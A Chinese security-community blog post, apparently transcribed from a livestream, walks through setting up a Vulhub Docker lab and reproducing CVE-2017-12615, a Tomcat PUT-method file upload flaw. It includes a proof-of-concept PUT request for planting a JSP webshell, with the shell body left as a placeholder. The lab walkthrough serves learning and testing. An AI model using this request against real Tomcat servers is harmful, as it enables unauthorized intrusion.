白帽子社区国庆活动详情将于明天上午十点准时发布!点击“白帽子社区国庆活动”可跳转到本次活动简介页面,欢迎各位转发本次活动链接,参与者皆有可能获得社区本次送出的国庆活动礼品一份!
本文出自社区攻防研究组 Ca1y0n
一、docker安装
修改apt源 可以从网上百度国内的源,这里用的是阿里云的参考链接:
https://blog.csdn.net/qq_38038143/article/details/82978836
1、安装docker环境
二、环境搭建
1、Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。
项目地址:
https://github.com/vulhub/vulhub
2、下载项目
wget https://github.com/vulhub/vulhub/archive/master.zip-O vulhub-master.zip
#自动化编译环境
sudo docker-compose build
#启动整个环境
sudo docker-compose up -d
构建完成后访问你的ip:8080进入到tomcat界面
三、漏洞复现
CVE-2017-12615 Tomcat任意文件上传漏洞
在tomcat下的conf文件夹下有一个web.xml文件,找到default servlet的配置项,也是在这个web.xml文件中,已经注释的地方说明了默认情况下readonly是true,并且如果是true的话,那么PUT和DELETE方法是被拒绝的,因此如果手动将readonly选项开启为false,那么就能够通过PUT方法上传文件了。
写入paylaod:
访问
上传小马
POC:
PUT /1.jsp/ HTTP/1.1Host: your-ip:8080Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0(compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type:application/x-www-form-urlencodedContent-Length: 25此处写入shell
本文为9-30直播内容文字版,直播录屏请在直播回顾中点击查看。
▼ 往期精彩回顾 ▼CTF中常见的加解密集合技术分享 | 一次偶然的渗透测试从Byte CTF中WEB赛题学习一个更有用的姿势 ▼ 更多技术资讯,请关注我们 ▼